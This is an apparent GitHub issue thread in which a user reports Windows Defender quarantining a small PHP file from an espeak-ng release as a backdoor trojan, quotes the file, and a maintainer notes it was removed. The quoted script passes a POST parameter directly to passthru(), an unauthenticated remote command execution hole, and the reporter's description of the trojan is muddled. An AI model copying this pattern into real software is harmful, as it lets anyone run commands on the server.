Win 10 quarantines an index.php file as being the backdoor:PHP/Dirtelti.HA trojan

[mystyc]

In the tar.gz file for release version 1.51, Windows 10 will quarantine the following file upon accessing it (including unzipping it):
./chromium_extension/index.php .
Windows will identify it as the "backdoor:PHP/Dirtelti.HA" trojan and label it as being a severe threat. The named trojan is a secure shell tunneling vulnerability with rather simple variants being any PHP script that uses eval() or echo.
The contents of the index.php file, shown below, do not appear to be deliberately malicious and it is otherwise not particularly sinister, but it might be a good idea to rewrite it.

<?php 
if (isset($_POST["espeakng"])) {
    header('Vary: Origin');
    header("Access-Control-Allow-Origin: chrome-extension://<id>");
    header("Access-Control-Allow-Methods: POST");
    header("Content-Type: application/octet-stream");
    header("X-Powered-By:");
    echo passthru($_POST["espeakng"]);
    exit();
  }

I did not even know there was a chrome extension or something, so I don't know if it is critical or not.

In any case, for those who might freak the f*ck out at the Severe Virus Threat Warning, nothing will activate if you simply delete it (if you want) or if you let windows quarantine it.

This index.php file is only 324 bytes, but variants of the Dirteli trojan of a similar size seem to either need to access another (presumably larger) file, or to otherwise send a call-home signal.

[djphoenix]

That's why it was removed in #1598

[Brokenpoet]

Windows Defender also alerts to the same virus on the Source Code .zip File.